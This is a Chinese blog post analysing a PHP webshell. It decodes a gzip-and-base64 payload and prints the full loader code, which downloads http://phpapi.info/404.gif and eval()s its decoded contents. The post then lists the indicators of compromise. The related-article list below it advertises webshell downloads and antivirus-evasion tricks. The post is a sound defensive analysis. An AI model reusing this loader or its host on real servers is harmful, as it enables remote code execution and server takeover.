php包含大马执行,对于某个PHP大马的分析

最新推荐文章于 2023-08-29 19:55:21 发布
最新推荐文章于 2023-08-29 19:55:21 发布
阅读量178 收藏
点赞数
文章标签: php包含大马执行

25be87471e71c6afc74ca46598ff75bb.png

阅读: 87

21cbe88d3c8bbcc5ac7c1ff92549b420.png

但是代码量却非常少:

c595fb00e78aa6b64fcff85b928dcb1a.png

不由得非常好奇它是如何用这么少的代码实现这么丰富的功能的。于是将它的 html 内容打印一下:

a09ffe5687a310b3973bdfd09e7198d6.png

发现它的内容是gz压缩后再base64加密的:

7724e787bfd472d6aac1d8593f0a6083.png

于是反向执行一下,得到原始内容:

error_reporting(0);

session_start();

if (!isset($_SESSION["phpapi"])) {

$c = '';

$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';

$url = base64_decode(base64_decode("YUhSMGNEb3ZMM0JvY0dGd2FTNXBibVp2THpRd05DNW5hV1k9Cg=="));

$urlNew= base64_decode("LzBPbGlha1RIaXNQOGhwMGFkcGg5cGFwaTUrcjZlY2kwYTh5aWptZzlveGNwOWNrdmhmLw==");

if (function_exists('fsockopen')) {

$link = parse_url($url);

$query = $link['path'];

$host = strtolower($link['host']);

$fp = fsockopen($host, 80, $errno, $errstr, 10);

if ($fp) {

$out = "GET /{$query} HTTP/1.0\r\n";

$out .= "Host: {$host}\r\n";

$out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";

$out .= "Connection: Close\r\n\r\n";

fwrite($fp, $out);

$inheader = 1;

$contents = "";

while (!feof($fp)) {

$line = fgets($fp, 4096);

if ($inheader == 0) {

$contents .= $line;

}

if ($inheader && ($line == "\n" || $line == "\r\n")) {

$inheader = 0;

}

}

fclose($fp);

$c = $contents;

}

}

if (!strpos($c, $urlNew) && function_exists('curl_init') && function_exists('curl_exec')) {

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_TIMEOUT, 15);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

curl_setopt($ch, CURLOPT_USERAGENT, $useragent);

$c = curl_exec($ch);

curl_close($ch);

}

if (!strpos($c, $urlNew) && ini_get('allow_url_fopen')) {

$temps = @file($url);

if (!empty($temps))

$c = @implode('', $temps);

if (!strpos($c, "delDirAndFile"))

$c = @file_get_contents($url);

}

if (strpos($c, $urlNew) !== false) {

$c = str_replace($urlNew, "", $c);

$_SESSION["phpapi"] = gzinflate(base64_decode($c));

}

}

if (isset($_SESSION["phpapi"])) {

eval($_SESSION["phpapi"]);

}

其中请求的url为:

http://phpapi.info/404.gif

用于替换的urlNew为:

/0OliakTHisP8hp0adph9papi5+r6eci0a8yijmg9oxcp9ckvhf/

将内容读出来之后,base64解码在用gz解压缩:

572644b0232719bd2c85ada9c435b51b.png

拿到原始的webshell文件(文件大概2960行,所以不贴全部的代码,只看一下头几行以及行数。需要的可以自己用上面的还原代码将gif内容还原为PHP文件):

5667392e4b46fc58e1fdca20db34a24a.png

该php的内容需要读取之后,放在eval()函数里执行,类似于:

eval(file_get_contents("/home/wwwroot/default/tmp.php"));

?>

整体的流程为:

74638d0fd68ef83ebc5b146471961ba8.png

所以,域名: phpapi.info 为恶意域名,上面的gif文件( http://phpapi.info/404.gif )不是普通的图片而是webshell代码。IOC:

domain:phpapi.info

url:/404.gif

md5:f1c4842de714e7480e69f41540c3626b

weixin_40008135
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防演练中PHP免杀大马分析实战_afei00123
afei001
07-10 923
在一次HVV行动中,在某天眼设备上发现红队在尝试通过命令执行下载了一个可疑的txt文件。该文件经分析是一个不错的免杀PHP大马
PHP大马过狗代码.php
05-31
该文件为PHP代码的大马,通过该文件,可以很好的绕过安全狗的检测,进而链接服务器。相关链接为https://download.csdn.net/download/wychy2008/10318498
实战分析PHP大马隐藏后门(案例一)的-PHP大马
07-07
实战分析PHP大马隐藏后门(案例一)的-PHP大马
PHP大马】定义、下载、使用、源码
06-01 2万+
PHP大马】适合第一次接触的
PHP大马后门分析
qq_17754023的博客
02-28 4043
PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门。 分析大马文件 打开下载的php大马,可以看出该大马是经过加密了的。 加密不用说,一看就是有后门 从源码开头可以看见 eval(gzinflate(base64_decode(" base64+gzin..
PHP小马,大马实现分析编写
Love&Share
03-15 1万+
PHP工具开发 PHP小马 简单隐藏 登陆密码 实现写入文件 <?php $pass = '14e1b600b1fd579f47433b88e8d85291'; #123456 $get = $_GET['pass']; if (!empty($get)) { if (md5(md5($get))) { if (!empty($_POST)) { $path=$_POST['filepath']; $content=$_P
实战分析PHP大马隐藏后门——(案例二)的PHP大马
07-07
实战分析PHP大马隐藏后门——(案例二)的PHP大马
php.rar_php大马_大马
09-21
php 大马,需要的可以 看看的.php 大马,需要的可以 看看的php 大马,需要的可以 看看的
sql_大马_sql_脱裤_php大马下载_php大马_
10-01
PHP大马通常是一段可以执行任意命令的PHP代码,攻击者可以通过它在受感染的服务器上执行操作,如上传、下载文件、执行系统命令等。它们往往隐藏在看似无害的PHP文件中,例如这里的"sql.php"。 **PHP脱裤大马**: ...
php超小免杀大马_PHP免杀大马的奇淫技巧
weixin_34150870的博客
02-28 2706
本文最后更新于可能会因为没有更新而失效。如已失效或需要修正,请留言!Part 1 Part 2大马后门检查: Fiddler 抓包 审计代码修改并运行脚本 Burp 抓包或者右键查看原代码 修改并运行代码 再使用 Burp 抓个包 查找关键字 GetHtml hmlogin localhost 等 把上图的 base64 代码解密下 Part 3大马源码免杀这里我使用的是国外的一款大...
webshell大马(asp,jsp,php
最新发布
weixin_56537388的博客
08-29 1109
可以在Windows Server虚拟机中搭建,具体的搭建步骤网上很多教程,这里不再赘述,这里主要演示asp大马的效果:上传asp大马,将大马放到IIS服务器的根目录。注意,要复现ASPX文件的大马,需要.NET环境,所以在搭建IIS服务器的时候,我们需要勾上上面的那些,使用大马:AspxSpy2014Final.aspx。需要搭建Tomcat环境,才能执行jsp文件。Tomcat环境配置教程网上有,也可以参考我这篇文章:Tomcat配置。登录之后,就可以看到功能界面了,这里演示cmd操作。
php图片大马加后门,一次对php大马的后门的简单分析
weixin_30923925的博客
03-12 574
一次对php大马的后门的简单分析有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次$password='Shiqi';//登录密码(支持菜刀)//----------功能程序------------------//$c="chr";session_start();if(empty($_SESSION['PhpCode'])){$url=$c(104).$c(116).$c(116...
解密PHP大马
sievr的博客
12-05 1950
今晚晚自习闲得无聊,总得找个什么事来做,emmm…… 前几天意外得到了个大马,用了用感觉还不错,但就是特征太明显了。这大马基本上公开了,看见界面就知道密码,我肯定不服啊,就来解个码玩玩。 这是下载到的。 看着这一大段代码就头疼,啥都不管,直接扔网站里解密一波。 结果特么没一个行的,这个网站说是混淆加密,那个网站说是zend加密。气的我直接退出了。 既然网站解不了,那就只能手动解码了。 现在我才来...
php 大马 mysql提权,Mysql提权-基于Mysql的webshell提权
weixin_33661631的博客
03-22 800
基于Mysql的webshell提权【实验目的】通过本实验理解webshell的使用方法,掌握如何通过webshell执行sql命令进行提权,熟悉基本的webshell提权思路。【实验环境】攻击机:Win2008-att用户名college,密码360College使用的webshell文件:dama.php目标靶机:Win2003-DVWA用户名college,密码360College【实验步骤...
浅谈PHP大马免杀之如何过狗过宝塔过阿里云D盾
iphp666的博客
09-17 2896
PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个马支持cmd命令,编辑文件不会空白,界面非常经典,最重要的是支持php7,高音甜中音准低音沉,总之一句话,就是通透! <?php $password='haha';//登录密码 //----------功能程序-----------...
实战分析PHP大马隐藏后门——案例二
W小哥
07-06 1696
一、PHP大马准备 PHP大马,示例如图所示 二、分析过程 第一步: 查看 php 大马的源码,惊奇的发现这代码也太少了吧,而且登录大马之后的功能还很多,代码这么少肯定有问题。 更多资源: 1、web安全工具、渗透测试工具 2、存在漏洞的网站源码与代码审计+漏洞复现教程、 3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频 4、应急响应真实案例复现靶场与应急响应教程 收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥 ...
php包含大马执行,分析一个常见的php大马并且解码过程
weixin_42433412的博客
03-09 421
[PHP] 纯文本查看 复制代码
【webshell分析PHP大马分析
热门推荐
尚未佩妥剑 转眼便江湖
12-25 7万+
起因 今天通过WAF拦截到了一个有趣的PHP大马,随后简单进行了分析。 一开始看到这段代码,还以为是变形的一句话木马,但通过本地执行发现功能挺强大的。 &lt;?php $password='admin';//登录密码 //本次更新:体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。 //功能特色:PHP高版本低版本都能执行,文件短小精悍,方便上传,功能强大...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值